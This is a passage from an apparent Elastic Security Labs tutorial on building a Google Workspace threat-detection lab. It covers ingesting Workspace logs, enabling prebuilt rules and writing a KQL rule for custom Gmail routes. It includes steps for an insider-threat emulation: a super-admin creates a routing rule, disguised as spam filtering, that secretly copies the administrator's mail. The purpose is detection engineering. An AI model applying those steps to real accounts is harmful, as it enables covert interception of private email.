<p>Once set, select “Create deployment” and the Elastic Stack will automatically be deployed in GCP, where your deployment credentials will be displayed. You can download these credentials as a CSV file or save them wherever you see fit; they are crucial for logging into your deployed stack. The deployment takes approximately 5 minutes to complete, and once finished you can select “continue” to log in. Congratulations, you have successfully deployed the Elastic Stack within minutes!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image9.jpg" alt="Default page after logging into deployed Elastic Stack" /></p>
<h2>Setup Fleet from the Security Solution</h2>
<p>As a reminder, <a href="https://www.elastic.co/es/guide/en/fleet/current/fleet-overview.html">Fleet</a> enables the creation of a security policy, which can incorporate the <a href="https://www.elastic.co/es/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html">GW integration</a> on an elastic-agent, in order to access and ingest GW logs into our stack.</p>
<h3>Create a Google Workspace Policy</h3>
<p>In order for our Elastic Agent to know which integration it is using, what data to gather, and where to stream that data within our stack, we must first set up a custom Fleet policy named Google Workspace.</p>
<p>To set up a Fleet policy, do the following in your Elastic Stack:</p>
<ul>
<li>Navigation menu &gt; Management &gt; Fleet &gt; Agent Policies &gt; Create agent policy</li>
<li>Enter “Google Workspace” as a name &gt; Create Agent Policy</li>
</ul>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image6.jpg" alt="Fleet agent policies page in Elastic Stack" /></p>
<h3>Install the Elastic agent on an Endpoint</h3>
<p>As previously mentioned, we have to install at least one agent on an endpoint to access data in GW; this agent will be subject to the deployed GW policy. We recommend a lightweight Linux host, either as a local VM or in a CSP such as GCP to keep everything in the same environment. I will be using an <a href="https://releases.ubuntu.com/focal/">Ubuntu 20.04 LTS</a> VM instance in Google Compute Engine (GCE), in the same GCP project we have been working in. Your endpoint can be lightweight, such as a GCP N1 or E2 series instance, as its sole purpose is to run the Elastic agent.</p>
<p>After your endpoint is set up, do the following in your Elastic Stack to deploy the agent:</p>
<ol>
<li>Navigation menu &gt; Management &gt; Fleet &gt; Agents &gt; Add Agent</li>
<li>Ensure the GW policy is selected</li>
<li>Select the appropriate OS</li>
<li>Select the clipboard icon to copy the commands</li>
<li>Run the commands on your endpoint to install the agent</li>
<li>Once finished, Fleet should show a checkmark and state 1 agent has been enrolled and Incoming data confirmed</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image24.png" alt="Installed Elastic agent on Linux endpoint and Fleet status page in Elastic Stack" /></p>
<h3>Assign Google Workspace Integration to Fleet Policy</h3>
<p>We must add the GW integration to our GW policy in order for it to collect data from GW and stream it to our Elastic Stack. We will configure the GW integration settings with the information created when we set up our GW environment, which avoids leaving <a href="https://attack.mitre.org/techniques/T1552/">unsecured credentials</a> on our Ubuntu host.</p>
<p>⚠️ The GW integration has a default interval of 2 hours, meaning the Elastic agent will retrieve data every 2 hours due to potential <a href="https://support.google.com/a/answer/7061566?hl=en">data retention and lag times</a>. This should be adjusted in the integration itself and is accounted for in the following steps within your Elastic Stack:</p>
<ol>
<li>Navigation menu &gt; Fleet &gt; Agent Policies &gt; Google Workspace &gt; Add Integration</li>
<li>Search for “Google Workspace” &gt; Select Google Workspace</li>
<li>Select “Add Google Workspace”</li>
<li>Enter the following information for this integration:
<ul>
<li>Integration name: google workspace</li>
<li>Jwt File: Copy contents of JSON file from service account creation steps</li>
<li>Delegated Account: <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a> (Use your own)</li>
<li>Interval: 10m</li>
<li>Agent policy: Google Workspace</li>
</ul>
</li>
<li>Select “Save and Continue”</li>
<li>Select “Save and deploy changes”</li>
</ol>
<p>Once completed, your GW integration should be assigned to your GW policy with one agent assigned this policy.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image18.jpg" alt="Google Workspace integration enabled in Fleet policy in Elastic Stack" /></p>
<p>To recap our Elastic Stack setup so far, we have completed the following:</p>
<ul>
<li>Deployed an Elastic Stack</li>
<li>Created a Fleet policy</li>
<li>Setup a lightweight Linux endpoint</li>
<li>Deployed an Elastic agent to the Linux endpoint</li>
<li>Enabled the Google Workspace integration inside our Fleet policy</li>
</ul>
<h3>Confirm Google Workspace Data Ingestion</h3>
<p>Rather than rely on the detection engineering (DE) higher powers, let’s take a second to confirm that GW data is actually being ingested into our stack as expected. We can rely on the Discover feature of the Elastic Stack, which allows us to search specific criteria across existing ECS documents. For this, we will use the filter criteria <code>data_stream.dataset : &quot;google_workspace.*&quot;</code> to look for any ECS documents that originate from a Google Workspace data stream.</p>
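<p>If you prefer to check ingestion programmatically rather than through Discover, the same filter can be expressed as Elasticsearch query DSL. A minimal sketch (the function name and time window are our own choices; run the payload against your deployment's <code>logs-*/_search</code> endpoint with your credentials):</p>

```python
def gw_ingest_check_query(minutes: int = 60) -> dict:
    """Query DSL equivalent of the Discover filter: count recent documents
    whose data stream dataset originates from Google Workspace."""
    return {
        "size": 0,
        "query": {
            "bool": {
                "filter": [
                    {"wildcard": {"data_stream.dataset": {"value": "google_workspace.*"}}},
                    {"range": {"@timestamp": {"gte": f"now-{minutes}m"}}},
                ]
            }
        },
        # Bucket hits per dataset (admin, login, drive, ...) for a quick overview.
        "aggs": {"datasets": {"terms": {"field": "data_stream.dataset"}}},
    }
```

<p>A non-zero hit count, or any buckets under the <code>datasets</code> aggregation, confirms documents are arriving.</p>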
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image1.png" alt="Search results for Google Workspace ECS documents in Elastic Stack via Discover" /></p>
<p>If you do not have any results, generate some activity within your GW, such as creating new users, enabling email routes, or creating new Organizational Units (OU), then refresh this query after the 10 minute interval has passed.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image5.gif" alt="" /></p>
<p>If results are found, congratulations are in order, because you now have a fully functional threat detection lab for Google Workspace with Elastic Security for SIEM!</p>
<h2>Enable Google Workspace Detection Rules</h2>
<p>As stated earlier, Elastic has 600+ pre-built detection <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/google_workspace">rules</a>, not only for Windows, Linux, and macOS endpoints, but also for several integrations, including GW. You can view our current GW rules and their MITRE ATT&amp;CK <a href="https://mitre-attack.github.io/attack-navigator/#layerURL=https%3A%2F%2Fgist.githubusercontent.com%2Fbrokensound77%2F1a3f65224822a30a8228a8ed20289a89%2Fraw%2FElastic-detection-rules-indexes-logs-google_workspaceWILDCARD.json&amp;leave_site_dialog=false&amp;tabs=false">coverage</a>.</p>
<p>To enable GW rules, complete the following in the Elastic Stack:</p>
<ol>
<li>Navigation menu &gt; Security &gt; Manage &gt; Rules</li>
<li>Select “Load Elastic prebuilt rules and timeline templates”</li>
<li>Once all rules are loaded:
<ul>
<li>Select “Tags” dropdown</li>
<li>Search “Google Workspace”</li>
<li>Select all rules &gt; Bulk actions dropdown &gt; Enable</li>
</ul>
</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image21.png" alt="Enabled pre-built detection rules where tag is Google Workspace in Elastic Stack" /></p>
<p>While we won’t go in-depth exploring all rule information, we recommend doing so. Elastic includes additional information such as related integrations, investigation guides, and more! You can also contribute back to the community by <a href="https://www.elastic.co/es/guide/en/security/current/rules-ui-create.html">creating your own detection rule</a> with the “Create new rule” button and <a href="https://github.com/elastic/detection-rules#how-to-contribute">contributing</a> to our detection rules repository.</p>
<h2>Let’s Trigger a Pre-Built Rule</h2>
<p>For this example, we will provoke the <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_custom_admin_role_created.toml">Google Workspace Custom Admin Role Created</a> detection rule. In our GW admin console, visit Account &gt; Admin roles and create a new role with the following information:</p>
<ol>
<li>Name: Curator</li>
<li>Description: Your Choice</li>
<li>Admin console privileges:
<ul>
<li>Alert Center: Full Access</li>
</ul>
</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image16.jpg" alt="Create an admin role in Google Workspace admin console" /></p>
<p>Now, we aren’t entirely sure why the Curator role would have access to our Alert Center, but the role seems either improperly scoped or someone wants to have the ability to potentially silence some alerts before our security team can investigate them. While the creation of administrative accounts (<a href="https://attack.mitre.org/techniques/T1136/003/">T1136.003</a>) is not unusual, they should always be investigated if unexpected to ensure cloud roles (<a href="https://attack.mitre.org/techniques/T1098/003/">T1098.003</a>) are properly scoped.</p>
<p>To view our detection alert, in your Elastic Stack, visit Navigation Menu &gt; Security &gt; Alerts and the page should show your alerts. From this, we can see that our rule triggered, as did <a href="https://github.com/elastic/detection-rules/blob/main/rules/integrations/google_workspace/persistence_google_workspace_api_access_granted_via_domain_wide_delegation_of_authority.toml">Google Workspace API Access Granted via Domain-Wide Delegation of Authority</a>.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image26.jpg" alt="Elastic Stack security alerts page displaying triggered alerts" /></p>
<p>If we select “View details” from the actions column, we receive a pop-out panel showing the alert overview, tabled data fields and values from our ECS document, as well as the raw JSON.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image3.png" alt="ECS document with tabled data view from Elastic Stack security alerts" /></p>
<p>Most detection rules for GW can be developed with a few consistent fields such as those we describe in our <a href="https://www.elastic.co/es/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html">documentation</a>, making new rules easier to create. If you would like to view all data fields for GW that the ECS schema contains, you can find that information <a href="https://www.elastic.co/es/guide/en/beats/filebeat/current/exported-fields-google_workspace.html">here</a>.</p>
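<p>Because most GW rules key on the same handful of fields, it can help to pull them out of a raw document in one place. A small sketch (our own helper, not an Elastic API; it walks the nested JSON shown in the alert details panel):</p>

```python
def gw_rule_fields(doc: dict) -> dict:
    """Extract the ECS fields most Google Workspace rules are built on,
    from a nested document like the raw alert JSON above."""
    def dig(path: str):
        # Walk dotted ECS paths through the nested document, e.g. "event.action".
        cur = doc
        for part in path.split("."):
            if not isinstance(cur, dict) or part not in cur:
                return None
            cur = cur[part]
        return cur
    return {
        "dataset": dig("event.dataset"),
        "action": dig("event.action"),
        "users": dig("related.user"),
        "setting": dig("google_workspace.admin.setting.name"),
    }
```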
<h2>Let’s Trigger a Custom Rule</h2>
<p>While pre-built detection rules are great for having threat coverage during onboarding, maybe you would like to search your data and create a new custom rule tailored to your environment.</p>
<p>Since the Elastic Stack is bundled with additional searching capabilities, we can rely on the Analytics <a href="https://www.elastic.co/es/guide/en/kibana/current/discover.html">Discover</a> feature to start searching through our raw data for GW related documents by visiting Navigation Menu &gt; Analytics &gt; Discover.</p>
<p>From here, we can change our data view to logs-* and then do an open-ended KQL query for <code>event.dataset: google_workspace*</code> which will return all documents where the source is from GW. You can then either start tabling the data based on available fields or view details about each document.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image2.png" alt="Google Workspace ECS documents search in Discover in Elastic Stack" /></p>
<p>This is important to understand because it influences rule development. Rules are often prototyped as a data reduction exercise, beginning very broad and being refined over time into an effective rule. If you are having difficulty after this exercise with creating detection logic, our <a href="https://github.com/elastic/detection-rules/blob/main/PHILOSOPHY.md">philosophy</a> on doing so may be of assistance.</p>
<p>First, we will add a user, Ray Arnold, to our organization with administrative access. With our Ray Arnold account, we will generate some suspicious events in GW, such as creating a custom email route in Gmail that forwards email destined for our primary administrator (Terrance) to Ray Arnold. In this scenario we are focused on the potential collection of sensitive information via an email forwarding rule (<a href="https://attack.mitre.org/techniques/T1114/003/">T1114.003</a>).</p>
<p>Complete the following steps:</p>
<ol>
<li>Add Ray Arnold as a user:
<ul>
<li>Navigate to the users settings in GW</li>
<li>Select “add new user”</li>
<li>First name: Ray</li>
<li>Last name: Arnold</li>
<li>Select “ADD NEW USER”</li>
</ul>
</li>
<li>Add Engineers group and make Ray Arnold the owner:
<ul>
<li>Navigate to groups settings in GW</li>
</ul>
</li>
</ol>
<p>You can configure the following settings like these examples:</p>
<ol>
<li>Group name: Engineers</li>
<li>Group email: <a href="mailto:engineering@dejesusarcheology.com">engineering@dejesusarcheology.com</a></li>
<li>Group Description: Engineering group at dinosaur park who are responsible for technology and feeding velociraptors.</li>
<li>Group owners: <a href="mailto:ray@dejesusarcheology.com">ray@dejesusarcheology.com</a></li>
<li>Labels: Mailing and Security</li>
<li>Who can join the group: Only invited users</li>
<li>Select “Create Group”</li>
</ol>
<p>Now we assign admin roles and privileges to Ray Arnold:</p>
<ol>
<li>Navigate to Ray Arnold’s user account</li>
<li>Select “Admin roles and privileges” &gt; Assign Roles</li>
<li>Super Admin -&gt; Assigned</li>
<li>Groups Admin -&gt; Assigned</li>
<li>Services Admin -&gt; Assigned</li>
<li>Select “Save”</li>
</ol>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image12.jpg" alt="Ray Arnold user created in Google Workspace with admin privileges" /></p>
<p>If done correctly, Ray Arnold should be a new user in GW for the DeJesus’ Archeology organization. He is also the owner of the Engineers group and has Super Admin, Groups Admin and Services Admin roles assigned to his account. Following this, we need to login to the GW admin console with Ray Arnold’s account and add a custom email route.</p>
<p>This provides our organization with an insider threat scenario. Ray Arnold was hired as an employee with authorization and authentication to GW admin console settings. Our organization trusts that Ray Arnold will uphold the terms agreed to during the hiring process in exchange for compensation. Risk mitigation is then up to the administrator when scoping the proper permissions and roles applied to Ray Arnold.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image13.png" alt="Simple overview of insider threat via email collection by forwarding rule in Google Workspace" /></p>
<p>Complete the following:</p>
<ol>
<li>Login to the admin console with Ray Arnold’s account</li>
<li>Select Navigation Menu &gt; Apps &gt; Google Workspace &gt; Gmail &gt; Routing</li>
<li>Select Configure for “Routing”</li>
<li>Enter the following information:
<ul>
<li>Description: Default administrator spam filtering</li>
<li>Email messages to affect: Inbound, Outbound, Internal - Sending, Internal - Receiving</li>
<li>Also deliver to: <a href="mailto:ray@dejesusarcheology.com">ray@dejesusarcheology.com</a></li>
<li>Account types to affect: Users</li>
<li>Envelope filter: Only affect specific envelope recipients (Email address: <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a>)</li>
</ul>
</li>
</ol>
<p>Now we can test our custom email route by sending <a href="mailto:terrance@dejesusarcheology.com">terrance@dejesusarcheology.com</a> an email from a separate account (we created a random email account with Proton) that is private and discusses details about new Paleo-DNA. Once you send the email, you can view Ray Arnold’s Gmail and see that this private message was additionally routed to <a href="mailto:ray@dejesusarcheology.com">ray@dejesusarcheology.com</a>. We now have an insider threat potentially selling private information about our Paleo-DNA tests to competitors. This we cannot allow!</p>
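<p>If you would rather script the probe message than click through a webmail client, Python's standard library is enough. A sketch (the SMTP host, credentials, and sender address below are placeholders, not values from this lab):</p>

```python
import smtplib
from email.message import EmailMessage

def build_test_email(sender: str, recipient: str) -> EmailMessage:
    """Compose the probe email; if the route is active, anything delivered to
    the recipient should also land in Ray Arnold's mailbox."""
    msg = EmailMessage()
    msg["From"] = sender
    msg["To"] = recipient
    msg["Subject"] = "Confidential: Paleo-DNA sequencing results"
    msg.set_content("Private discussion of the new Paleo-DNA tests.")
    return msg

# Sending requires your own SMTP server and credentials (placeholders below):
#   with smtplib.SMTP_SSL("smtp.example.com") as server:
#       server.login("user", "password")
#       server.send_message(
#           build_test_email("tester@example.com", "terrance@dejesusarcheology.com"))
```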
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image11.gif" alt="" /></p>
<h3>Identify a Potential Detection Rule for Custom Gmail Routes</h3>
<p>Luckily, we have the Elastic Stack on our side to help us thwart this potential insider threat by detecting custom Gmail route creations! Within your Elastic Stack, visit Navigation Menu &gt; Analytics &gt; Discover and let’s start creating our KQL query. Below are the query filters we should be looking for and the final query.</p>
<p>KQL query: <code>event.dataset: google_workspace.admin and event.action: &quot;CREATE_GMAIL_SETTING&quot; and not related.user: terrance and google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)</code></p>
<p>Let’s break this down further to explain what we are looking for:</p>
<p><code>event.dataset: google_workspace.admin</code> - Documents in ECS where the data is sourced from GW, specifically admin reporting. Since a user needs to be an administrator to change these settings, we should expect data to come from admin reporting; matches may also indicate a compromised admin account or abuse of an admin account not set up with the principle of least privilege (PoLP).</p>
<p><code>event.action: &quot;CREATE_GMAIL_SETTING&quot;</code> - The creation of a Gmail setting which is typically done by administrators.</p>
<p><code>not related.user: terrance</code> - Excludes Gmail setting changes by the administrator “terrance”, who is the only administrator expected to be touching such settings.</p>
<p><code>google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)</code> - These setting names are specific to Gmail routing rules.</p>
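<p>The same logic can be expressed as a plain Python predicate, which is handy for testing detection ideas against sample events before committing them to a rule. A sketch (our own function, not Elastic tooling; it expects dotted field names as shown in Discover's table view):</p>

```python
def matches_custom_gmail_route(doc: dict) -> bool:
    """Mirror of the KQL query above, applied to one flattened ECS document."""
    users = doc.get("related.user") or []
    if isinstance(users, str):
        users = [users]
    return (
        doc.get("event.dataset") == "google_workspace.admin"
        and doc.get("event.action") == "CREATE_GMAIL_SETTING"
        and "terrance" not in users
        and doc.get("google_workspace.admin.setting.name")
        in ("MESSAGE_SECURITY_RULE", "EMAIL_ROUTE")
    )
```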
<p>Plugging this query into Discover, we have matching documents for this activity being reported in GW!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image10.png" alt="Custom query search in Elastic Stack Discover for email forwarding rule creation" /></p>
<h3>Create a Custom Rule in the Security Feature</h3>
<p>Let’s wrap this up by adding our custom detection rule for this!</p>
<p>To add your custom rule, complete the following:</p>
<ol>
<li>In your Elastic Stack, select Navigation menu &gt; Security &gt; Manage &gt; Rules</li>
<li>Select “Create new rule”</li>
<li>Enter the following information:
<ul>
<li>Define rule: Source, Index Patterns: logs-google_workspace*</li>
<li>Custom query: Our custom query</li>
</ul>
</li>
</ol>
<p>And we define rule metadata:</p>
<ol>
<li>Name: Google Workspace Custom Forwarding Email Route Created</li>
<li>Description: Your choice</li>
<li>Default severity: High</li>
<li>Tags: Google Workspace</li>
</ol>
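<p>If you would rather create the rule via the API than the UI, the same definition can be posted to Kibana's detection engine (<code>POST /api/detection_engine/rules</code>). A minimal sketch of the payload; the risk score and description text are our own choices, and your deployment URL and credentials are assumed:</p>

```python
def custom_route_rule() -> dict:
    """Payload mirroring the UI steps above for the custom Gmail route rule."""
    return {
        "name": "Google Workspace Custom Forwarding Email Route Created",
        "description": "Detects creation of a custom Gmail forwarding route.",
        "type": "query",
        "index": ["logs-google_workspace*"],
        "query": (
            "event.dataset: google_workspace.admin and "
            'event.action: "CREATE_GMAIL_SETTING" and '
            "not related.user: terrance and "
            "google_workspace.admin.setting.name: (MESSAGE_SECURITY_RULE or EMAIL_ROUTE)"
        ),
        "severity": "high",
        "risk_score": 73,  # our own choice; matches Kibana's default for "high"
        "tags": ["Google Workspace"],
        "enabled": True,
    }
```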
<p>What is fantastic about this custom rule is that we can send a notification via our platform of choice, so we are notified immediately when this alert is triggered.</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image17.jpg" alt="Security alert action for custom rule" /></p>
<p>Then select “Create &amp; enable rule” at the bottom to create your custom rule. If we replay the steps above to create a custom Gmail forwarding rule, we will now see an alert and receive a notification about the alert trigger!</p>
<p><img src="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/image15.png" alt="Security alert for new custom detection rule in Elastic Stack" /></p>
<p>At this point, we are aware that Ray Arnold has created a custom Gmail route rule in GW without authorization. From our alert in the Elastic Stack and the notification to the CEO, we can now take action to mitigate further risk.</p>
<h2>Takeaways</h2>
<p>As demonstrated, Elastic’s security solution and the Elastic Stack allow us to ingest GW reporting logs and scan this data with pre-built detection rules or custom rules. Combine this with other features of the stack such as <a href="https://www.elastic.co/es/enterprise-search">Enterprise Search</a>, <a href="https://www.elastic.co/es/observability">Observability</a>, and a very simple cloud stack deployment process and we can start detecting threats in our GW environment in no time.</p>
<p>It’s been quite a journey and you have accomplished an incredible amount of work. In part three of this series: Detecting Common Threats, we will emulate some common Google Workspace abuse by threat actors and create more advanced detection logic for these. Hold on tight, because it's about to get WILD.</p>
<p>Also, there is still so much more to explore within the Elastic Stack, as you have probably already found during this lab, so feel free to explore! Elastic continues to take action on security transparency as <a href="https://www.elastic.co/es/blog/continued-leadership-in-open-and-transparent-security">recently</a> discussed.</p>
<p>Hopefully this provides you with a better understanding of the powerful capabilities within the Elastic Stack and how to use it to detect potential threats in GW. Thanks for reading/following along and may we all be in the capable hands of detection engineers in part three.</p>
]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/es/security-labs/assets/images/google-workspace-attack-surface-part-two/photo-edited-01-e.jpg" length="0" type="image/jpg"/>
        </item>
    </channel>
</rss>